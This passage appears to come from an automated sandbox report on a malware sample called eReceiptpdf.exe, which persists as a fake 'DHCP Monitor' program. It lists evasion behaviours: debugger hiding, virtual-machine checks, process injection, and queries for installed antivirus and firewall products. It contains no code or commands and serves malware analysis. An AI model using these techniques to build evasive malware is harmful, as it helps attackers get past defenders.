      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exe TID: 6304Thread sleep time: -7378697629483816s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6908Thread sleep time: -30000s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6788Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1860Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWindow / User API: threadDelayed 3224
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWindow / User API: threadDelayed 5855
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWindow / User API: foregroundWindowGot 716
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWindow / User API: foregroundWindowGot 597
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: Amcache.hve.11.drBinary or memory string: VMware
      Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
      Source: Amcache.hve.11.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
      Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
      Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.11.drBinary or memory string: VMware7,1
      Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.me
      Source: Amcache.hve.11.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
      Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
      Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
      Source: C:\Users\user\Desktop\eReceiptpdf.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\Desktop\eReceiptpdf.exeMemory written: C:\Users\user\Desktop\eReceiptpdf.exe base: 400000 value starts with: 4D5A
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMemory written: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess created: C:\Users\user\Desktop\eReceiptpdf.exe C:\Users\user\Desktop\eReceiptpdf.exe
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
      Source: eReceiptpdf.exe, 00000000.00000000.295792070.0000000001B10000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: eReceiptpdf.exe, 00000000.00000000.295792070.0000000001B10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: eReceiptpdf.exe, 00000000.00000000.295792070.0000000001B10000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: eReceiptpdf.exe, 00000000.00000000.295792070.0000000001B10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\eReceiptpdf.exeQueries volume information: C:\Users\user\Desktop\eReceiptpdf.exe VolumeInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeQueries volume information: C:\Users\user\Desktop\eReceiptpdf.exe VolumeInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\eReceiptpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
